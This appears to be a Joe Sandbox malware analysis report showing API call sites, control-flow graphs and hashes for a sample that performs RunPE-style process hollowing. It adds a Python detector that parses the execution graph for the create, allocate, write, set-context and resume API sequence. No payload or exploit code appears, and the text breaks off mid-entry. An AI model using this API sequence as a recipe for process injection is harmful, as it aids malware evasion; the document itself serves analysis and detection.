                        The 07ABxxxx nodes, followed along the graph edges from 7ab3845 through 7ab0d38 (CreateProcessA) and on to the WriteProcessMemory, Wow64SetThreadContext and ResumeThread nodes, form the create-process, allocate-remote, write, set-thread-context, resume sequence of a RunPE-style process hollowing into a 32-bit child; ReadProcessMemory on the same path is consistent with reading the child's PEB before the image is replaced.
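The execution graph is emitted as one whitespace-separated token stream: `<id> <address> [API ...]` node records and `<src>-><dst>` edges, with some nodes summarised as "N API calls". The Python below is an added example, not Joe Sandbox code and not the sample's code; it parses an excerpt of that serialization (the excerpt is copied from the graph in this report and shortened) and checks the recovered API set for the five process-hollowing stages. Assumptions that the report does not state: node ids are five-digit integers, and the stage table HOLLOWING_STAGES is this example's own mapping, not a Joe Sandbox signature.

```python
"""Parse a Joe Sandbox execution_graph token stream and test it for the
process-hollowing API set. Added example; not Joe Sandbox code and not the
sample's code. Assumptions (not from the report): node ids are 5-digit integers,
and HOLLOWING_STAGES is this example's own table, not a vendor signature."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID_RE = re.compile(r"^\d{5}$")                            # assumption: 5-digit node ids
API_RE = re.compile(r"^[A-Z][A-Za-z0-9]*[a-z][A-Za-z0-9]*$")    # WriteProcessMemory yes, "API" no

# Excerpt of the execution_graph on this page, shortened (constructed test input).
SAMPLE_GRAPH = """
execution_graph 48107 57226b0 48108 5722718 CreateWindowExW 48107->48108 48110 57227d4 48108->48110
48262 7ab3845 48311 7ab0d38 48262->48311 48264 7ab388a 48265 7ab0aaa WriteProcessMemory 48264->48265
48312 7ab0dc1 48311->48312 48313 7ab0f26 CreateProcessA 48312->48313 48314 7ab0f83 48313->48314
48303 7ab0918 48304 7ab095d Wow64SetThreadContext 48303->48304
48337 7ab0868 48338 7ab08a8 ResumeThread 48337->48338
48345 7ab09ea 48346 7ab09f0 VirtualAllocEx 48345->48346
48319 7ab0b98 48320 7ab0ba0 ReadProcessMemory 48319->48320
48118 5720254 48119 572025f 48118->48119 48128 5720254 3 API calls 48127->48128
"""


@dataclass
class ExecGraph:
    addr: Dict[str, str] = field(default_factory=dict)        # node id -> hex address
    apis: Dict[str, List[str]] = field(default_factory=dict)  # node id -> APIs on that node
    edges: List[Tuple[str, str]] = field(default_factory=list)


def parse_execution_graph(text: str) -> ExecGraph:
    """Token stream: '<id> <addr> [API ...]' node records and '<src>-><dst>' edges.
    Summary annotations such as '3 API calls' carry no API name and are skipped."""
    g = ExecGraph()
    cur: Optional[str] = None
    expect_addr = False
    for tok in text.split():
        m = EDGE_RE.match(tok)
        if m:
            g.edges.append((m.group(1), m.group(2)))
        elif expect_addr:                    # the token right after a node id is its address
            g.addr[cur] = tok
            g.apis[cur] = []
            expect_addr = False
        elif NODE_ID_RE.match(tok):
            cur, expect_addr = tok, True
        elif cur is not None and API_RE.match(tok):
            g.apis[cur].append(tok)          # 'execution_graph', '3', 'API', 'calls' fall through
    return g


# Stage -> API names that implement it. This example's own table, not a Joe Sandbox signature.
HOLLOWING_STAGES: Dict[str, Set[str]] = {
    "create_target":   {"CreateProcessA", "CreateProcessW"},
    "allocate_remote": {"VirtualAllocEx", "NtAllocateVirtualMemory"},
    "write_payload":   {"WriteProcessMemory", "NtWriteVirtualMemory"},
    "hijack_thread":   {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"},
    "resume_thread":   {"ResumeThread", "NtResumeThread"},
}


def all_apis(g: ExecGraph) -> Set[str]:
    return {api for apis in g.apis.values() for api in apis}


def nodes_calling(g: ExecGraph, api: str) -> List[str]:
    """Addresses of the nodes that call `api`, sorted, duplicates collapsed."""
    return sorted({g.addr[n] for n, apis in g.apis.items() if api in apis})


def hollowing_indicators(g: ExecGraph) -> Dict[str, Optional[str]]:
    """For each stage, the first matching API seen anywhere in the graph, or None."""
    seen = all_apis(g)
    return {stage: next((a for a in sorted(names) if a in seen), None)
            for stage, names in HOLLOWING_STAGES.items()}


def looks_like_process_hollowing(g: ExecGraph) -> bool:
    """True when all five stages are present. An indicator only: the graph shows
    neither the CREATE_SUSPENDED flag nor what was written, so confirm it against
    the process tree (which child was spawned, and whether its image was replaced)."""
    return all(api is not None for api in hollowing_indicators(g).values())


if __name__ == "__main__":
    graph = parse_execution_graph(SAMPLE_GRAPH)
    for stage, api in hollowing_indicators(graph).items():
        where = nodes_calling(graph, api) if api else ""
        print(f"{stage:16s} {api or '-':24s} {where}")
    print("process hollowing pattern:", looks_like_process_hollowing(graph))
```

The check is deliberately order-insensitive: Joe Sandbox's graph is a static over-approximation (note the 100% dynamic/decrypted code coverage figure above), and the same five APIs occur in debuggers and installers, so treat a hit as a triage signal to be corroborated by the parent-child relationship and the dumped memory of the child, not as a verdict.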
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e7540dc59b19f7f1d67f32ee57ad85410bc9873cccde2e31ad74e19ac2335e6a
                        • Instruction ID: d3551ee0cce0018a619b7b84378dafa6db3057fd6a232d1e9dc0aa0b2aa1ad6b
                        • Opcode Fuzzy Hash: e7540dc59b19f7f1d67f32ee57ad85410bc9873cccde2e31ad74e19ac2335e6a
                        • Instruction Fuzzy Hash: 13F0A7B495D2889BC7108B54E4550F4BFBC9B5F211F056193C92DD72A3D6304808CB01
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 80779b575362846e720ee6442553a9c30a3ecf02b4fae6429027da7609ab0ea5
                        • Instruction ID: 3a5872cb48e094d248d5a379a7826d1c0fa8fb31b60b34f1679004d37d6b882a
                        • Opcode Fuzzy Hash: 80779b575362846e720ee6442553a9c30a3ecf02b4fae6429027da7609ab0ea5
                        • Instruction Fuzzy Hash: D1E0B6B896D058CACB20DF94E4564F8FBBCAB4F351F4060A6DA2EA3213D6305944CB41

                        Control-flow Graph

                        Function at 159dc08-159ddd5. Basic blocks (address ranges) that call an API:
                        • 159dc08-159dc97: GetCurrentProcess
                        • 159dca0-159dcd4: GetCurrentThread
                        • 159dcdd-159dd11: GetCurrentProcess
                        • 159dd3b-159dd6a: GetCurrentThreadId
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 0159DC86
                        • GetCurrentThread.KERNEL32 ref: 0159DCC3
                        • GetCurrentProcess.KERNEL32 ref: 0159DD00
                        • GetCurrentThreadId.KERNEL32 ref: 0159DD59
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205697017.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1590000_jdSldfVS.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: e9e9dc4a83434fd45b2699ebdb3fef3bd75a323cb5c8e9d70a11be0eab893279
                        • Instruction ID: 2858aec23a96a320a8553d3bc949dc5b86d011d55dbb4c33e07151434527fe2d
                        • Opcode Fuzzy Hash: e9e9dc4a83434fd45b2699ebdb3fef3bd75a323cb5c8e9d70a11be0eab893279
                        • Instruction Fuzzy Hash: D55145B090134ACFEB04DFAAD548BDEBBF1BF88304F248459D119AB360DB795944CB66

                        Control-flow Graph

                        Function at 7ab0d2d-7ab107d. The only basic block that calls an API is 7ab0ec7-7ab0f81: CreateProcessA. Three short self-looping blocks precede the call (7ab0ded-7ab0dfc, 7ab0e46-7ab0e55, 7ab0eae-7ab0ebd); the blocks from 7ab0f8a-7ab1010 onward run after it and end in a self-loop at 7ab107d.
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07AB0F6E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: abbe63fc5fccbccf20184a9543d6a8279b4ce6b75af941a85c6407777822ab20
                        • Instruction ID: 6e2e25dc733e8afe045631eab3d315de360909b76e89e2f8c3a85bf02d125426
                        • Opcode Fuzzy Hash: abbe63fc5fccbccf20184a9543d6a8279b4ce6b75af941a85c6407777822ab20
                        • Instruction Fuzzy Hash: 12A15EB1D0025EDFDB20CFA9C8417DEBBB6BF88314F1481A9E818A7241D7759985CF92

                        Control-flow Graph

                        Function at 7ab0d38-7ab107d (same body as the function at 7ab0d2d, entered eleven bytes later). The only basic block that calls an API is 7ab0ec7-7ab0f81: CreateProcessA; the same three self-looping blocks precede the call and the same self-loop at 7ab107d ends the function.
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07AB0F6E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 1787cc534c360e837c524c38a0a79a1f2fed9bc2fe547cf3a624146ae78f2914
                        • Instruction ID: 00cdf3c496250d13e0aa94e9c70845840b15f5d1dcd519deb2904cbf4b8f2cf4
                        • Opcode Fuzzy Hash: 1787cc534c360e837c524c38a0a79a1f2fed9bc2fe547cf3a624146ae78f2914
                        • Instruction Fuzzy Hash: AC9160B1D0025EDFDB20CFA9C8417DEBBB6BF88314F1481A9E818A7241D7759985CF92

                        Control-flow Graph
                        • Basic blocks: 159be3f-159c0d0
                        • API call sites: GetModuleHandleW (block 159c088-159c0b3)
                        • Internal calls: 159b824, 159b830, 159b840, 159b850, 159b860, 159c0d8, 159c0e8, 159c3d8, 159c3e8
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0159C0A6
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205697017.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1590000_jdSldfVS.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 1e0589921a9c9e83e04dcec0c42d3b3a8212bed4b4fe985d34be08d39d580f50
                        • Instruction ID: 6ba17cac02cb299d80ddbf5d6a7c00d429c573e6135a8544b0dceed32752dc02
                        • Opcode Fuzzy Hash: 1e0589921a9c9e83e04dcec0c42d3b3a8212bed4b4fe985d34be08d39d580f50
                        • Instruction Fuzzy Hash: C1814970A00B058FEB24DF29E444B5ABBF5FF88204F00892DD55ADBA50D775E945CF92

                        Control-flow Graph
                        • Basic blocks: 57226b0-5722821
                        • API call sites: CreateWindowExW (block 5722733-57227d2)
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 057227C2
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2211797904.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_5720000_jdSldfVS.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: ac5de282a9ced1e634e192d8c7406b4bed29603e1d9db18da766f1755ff39e73
                        • Instruction ID: 6146574ec69ff75b673f59a3118c03b0d47cd2dc04d70f54e0f085705bddb4be
                        • Opcode Fuzzy Hash: ac5de282a9ced1e634e192d8c7406b4bed29603e1d9db18da766f1755ff39e73
                        • Instruction Fuzzy Hash: 9A41CEB5D043599FDB14CF9AC884ADEFBB5FF48310F24812AE819AB211D7719885CF90

                        Control-flow Graph
                        • Basic blocks: 57226a4-5722821
                        • API call sites: CreateWindowExW (block 5722773-57227d2)
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 057227C2
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2211797904.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_5720000_jdSldfVS.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: e6926b7202b5d5149121f8805b5baf236f20314c4179c378176053d6fcdc297d
                        • Instruction ID: 160722dbfd613a0c0799a60640e33372f3fee6040916d03786f51be26ea1c55c
                        • Opcode Fuzzy Hash: e6926b7202b5d5149121f8805b5baf236f20314c4179c378176053d6fcdc297d
                        • Instruction Fuzzy Hash: 9451CEB5C003599FDB14CFA9C984ADEBBB1FF48310F24812AE819AB211D775A945CF90

                        Control-flow Graph
                        • Basic blocks: 1593414-1593569
                        • API call sites: CreateActCtxA (block 1593434-15934e1)
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 015934D1
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205697017.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1590000_jdSldfVS.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: f2991bb7249a008fb93690bed0b9185984a46e1f2d0fda16766cf0f9caad579e
                        • Instruction ID: e42645b7904d42774548311bb45ec9bba0e8d43392593ea7d3780708463dce7d
                        • Opcode Fuzzy Hash: f2991bb7249a008fb93690bed0b9185984a46e1f2d0fda16766cf0f9caad579e
                        • Instruction Fuzzy Hash: 9D41EFB0C00618CFEF24CFA9C844BDEBBB5BF88704F20856AD508AB251DB756949CF91

                        Control-flow Graph
                        • Basic blocks: 1591fb8-1593569
                        • API call sites: CreateActCtxA (block 1591fb8-15934e1)
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 015934D1
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205697017.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1590000_jdSldfVS.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: ec8c39cd416571d51a6e6ca36f869cf2aa1a67eeba33ece9b9234cf3493eeca6
                        • Instruction ID: c66383b5fd711a086862d3fc0859e2c0c626f2481034c1102af0605fa0ba9308
                        • Opcode Fuzzy Hash: ec8c39cd416571d51a6e6ca36f869cf2aa1a67eeba33ece9b9234cf3493eeca6
                        • Instruction Fuzzy Hash: 5441CFB0C0061DCBEB24DFAAC844BDEBBF5BF48704F20856AD508AB251DB756945CF91

                        Control-flow Graph
                        • Basic blocks: 5724c7e-5724d6c
                        • API call sites: CallWindowProcW (block 5724cea-5724d22)
                        • Internal calls: 5720254 (from block 5724d3c-5724d5c)
                        APIs
                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05724D11
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2211797904.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_5720000_jdSldfVS.jbxd
                        Similarity
                        • API ID: CallProcWindow
                        • String ID:
                        • API String ID: 2714655100-0
                        • Opcode ID: a771ef0e267bcb55fc960603bd93f0ad8d9235da288cacbcd48271b1aefdfb45
                        • Instruction ID: 276ac286c4b4965714fe4f39d8edbfb81f6b43b877caf1b778f3bd543da81e18
                        • Opcode Fuzzy Hash: a771ef0e267bcb55fc960603bd93f0ad8d9235da288cacbcd48271b1aefdfb45
                        • Instruction Fuzzy Hash: 633105B9A00315CFDB14CF99C488AAABBF6FF88314F24C459D519AB321D774A841DFA0

                        Control-flow Graph
                        • Basic blocks: 7ab0aaa-7ab0b86
                        • API call sites: WriteProcessMemory (block 7ab0b0e-7ab0b4d)
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07AB0B40
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 7a99b4b68df9e6329fbcf59f93a2bfee451dacbca9b5fd3867f85b21f4ed72c5
                        • Instruction ID: 857b28b8f4fd4ecb71174570afd9433d85ff5edc77d64a6142c5a2a7b00bb121
                        • Opcode Fuzzy Hash: 7a99b4b68df9e6329fbcf59f93a2bfee451dacbca9b5fd3867f85b21f4ed72c5
                        • Instruction Fuzzy Hash: AF215AB19003499FDB10DFA9C881BDFBBF4FF88314F10842AE918A7241C7789954CBA5

                        Control-flow Graph
                        • Basic blocks: 7ab0ab0-7ab0b86
                        • API call sites: WriteProcessMemory (block 7ab0b0e-7ab0b4d)
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07AB0B40
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 3c27dbfca6e6679bdfc09f3a81e887b4b478aebcb4df31e3f8a95354b0780f8c
                        • Instruction ID: 4c3614373c2b1be68d16e58bf004147a5c773af072a54d04e0243e005733ab2b
                        • Opcode Fuzzy Hash: 3c27dbfca6e6679bdfc09f3a81e887b4b478aebcb4df31e3f8a95354b0780f8c
                        • Instruction Fuzzy Hash: 132125B19003599FDB10DFAAC881BDFBBF5FF88314F10842AE919A7241C7799954CBA4

                        Control-flow Graph
                        • Basic blocks: 7ab0b98-7ab0c66
                        • API call sites: ReadProcessMemory (block 7ab0b98-7ab0c2d)
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07AB0C20
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: c3cfa26f7d1c76e9b58cff4cd8f11e299762f2f761d848e2991067ddaa567b14
                        • Instruction ID: 09c90b476d829c9e5c3accf749051bde9b5cc3f20ccde0ccd2b2798829815069
                        • Opcode Fuzzy Hash: c3cfa26f7d1c76e9b58cff4cd8f11e299762f2f761d848e2991067ddaa567b14
                        • Instruction Fuzzy Hash: 012119B18003599FDB10DFAAD841BDFBBF5FF48310F10842AE518A7251C7399954CBA5

                        Control-flow Graph
                        • Basic blocks: 7ab0910-7ab09dc
                        • API call sites: Wow64SetThreadContext (block 7ab0973-7ab09a3)
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AB0996
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: d2fa9dac18dcb9f5e8675969d7856cd543730d8a4e9c6923e118a9970b41ad38
                        • Instruction ID: 0e9807be399e9f48f714090352adce1fc3576f29f5c3d80d09800daef8e8e92c
                        • Opcode Fuzzy Hash: d2fa9dac18dcb9f5e8675969d7856cd543730d8a4e9c6923e118a9970b41ad38
                        • Instruction Fuzzy Hash: EA213AB19003499FEB10DFAAC4857EFBBF4EF88324F14842AD559A7241C7789944CFA5
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07AB0C20
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 0e74c5243a111b235f4f74c9790522b458edaf124d4d8b68b1fe3bf2b37b54cc
                        • Instruction ID: 10b26d488f325eb8fe8c0973edc59114f15a32079eb9bce54e98edb54670e7d4
                        • Opcode Fuzzy Hash: 0e74c5243a111b235f4f74c9790522b458edaf124d4d8b68b1fe3bf2b37b54cc
                        • Instruction Fuzzy Hash: 4F2128B18003599FDB10DFAAC881ADFFBF5FF48310F10842AE518A7251C7399950CBA5
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AB0996
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: b069ffa7a253c898aa97cb969eaef1db30c5a63ed6a190f3e5bc9068b05084d9
                        • Instruction ID: 5bc845054ae1a2c052e6bd350fd9ba5e1fecbccc6d83268fcc89709db0adb675
                        • Opcode Fuzzy Hash: b069ffa7a253c898aa97cb969eaef1db30c5a63ed6a190f3e5bc9068b05084d9
                        • Instruction Fuzzy Hash: 0E2118B19003099FEB10DFAAC4857EFBBF4EF88364F14842AD559A7241C7789944CFA5
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0159E2DF
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205697017.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1590000_jdSldfVS.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 1c55e4a7aa428d7212a431b8537aed5cd7d553b845de7e7bbbc002b0ce7ec888
                        • Instruction ID: efdf88b05f207e483105a1ac5d3802e00448379e5bbff35ff1378f0127336942
                        • Opcode Fuzzy Hash: 1c55e4a7aa428d7212a431b8537aed5cd7d553b845de7e7bbbc002b0ce7ec888
                        • Instruction Fuzzy Hash: 9D21E4B59002599FDF10CF9AD884ADEFBF4FB48310F14841AE914A7310D375A954CFA5
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0159C121,00000800,00000000,00000000), ref: 0159C332
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205697017.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1590000_jdSldfVS.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: f76a441c438d45b8d6147e4663b0666ec680d9b385b0b7a11cc0da1fd4faa065
                        • Instruction ID: 047d9fa2882e3f7e21c1498db71d679a44316f6bf0f91855217f25a3ddaefa1d
                        • Opcode Fuzzy Hash: f76a441c438d45b8d6147e4663b0666ec680d9b385b0b7a11cc0da1fd4faa065
                        • Instruction Fuzzy Hash: 1611E2B69043499FDF14DF9AC444ADEFBF4FB88320F14846AE519AB200C379A945CFA5
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07AB0A5E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: f6c88b5d6b3c811a51526f02c91ebb067a5463edc2b66d4f6c9615b6ea8287f0
                        • Instruction ID: ed27c7fbdc3deee3aac3ee67b609c3cdc8505e268668a2169de6aed8208ad264
                        • Opcode Fuzzy Hash: f6c88b5d6b3c811a51526f02c91ebb067a5463edc2b66d4f6c9615b6ea8287f0
                        • Instruction Fuzzy Hash: DB1159728002499FDB10DFAAC845BDFBBF5EF88324F148819E525A7250C7759550CFA5
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0159C121,00000800,00000000,00000000), ref: 0159C332
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205697017.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1590000_jdSldfVS.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: a94bb824fae56cd8b0b4de6402bdd27bd95dbb0a545dc880fec8f1de26fb9fd7
                        • Instruction ID: 3ac18496e699793168d63100ad423ec03c0822b4a82fd71766d233f05969d359
                        • Opcode Fuzzy Hash: a94bb824fae56cd8b0b4de6402bdd27bd95dbb0a545dc880fec8f1de26fb9fd7
                        • Instruction Fuzzy Hash: C81126B6800349DFDB10DF9AC484ADEFBF4FB88320F14842AD559A7210C379A545CFA5
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07AB0A5E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 8bd12f4a6b09f8b12378edeeb92abb881a7632218a70531418e99160baa13817
                        • Instruction ID: b8ad15edd1b5aaa02c95867acdeab3517b6e16c848ea826ec605132f54149da6
                        • Opcode Fuzzy Hash: 8bd12f4a6b09f8b12378edeeb92abb881a7632218a70531418e99160baa13817
                        • Instruction Fuzzy Hash: 7C1137728003499FDB10DFAAC845BDFBBF5EF88720F148819E515A7250C7759950CFA5
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: ec8b187649ea05f0ddc8fce24a560149c7ea21fd75e9f20d198a791edc3e8469
                        • Instruction ID: 2f4fe4bd6ea6ce57c58c3cb522e287a9de0d304489ab044002c74a66c691cd21
                        • Opcode Fuzzy Hash: ec8b187649ea05f0ddc8fce24a560149c7ea21fd75e9f20d198a791edc3e8469
                        • Instruction Fuzzy Hash: 3A1128B19003498FDB20DFAAC4457DFFBF4EB88724F248819D519A7240C775A944CF95
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0159C0A6
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205697017.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1590000_jdSldfVS.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: cac97fc9e9146e4b450ba0276b9cb4cdccf2e05285816d60cc9667c8c32c5859
                        • Instruction ID: f1e4c09094d4c6d731eea0b75bb42d6fb1682023c0ef9d87bcaccdcec83d3b77
                        • Opcode Fuzzy Hash: cac97fc9e9146e4b450ba0276b9cb4cdccf2e05285816d60cc9667c8c32c5859
                        • Instruction Fuzzy Hash: E61110B5C007498FDB10DF9AC444ADEFBF4BB89320F10841AD918B7210C37AA545CFA2
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07AB498D
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: e83b8b0f609370a783bc15a841701a5bacc115b909bbcb9ae998ebbff27516bf
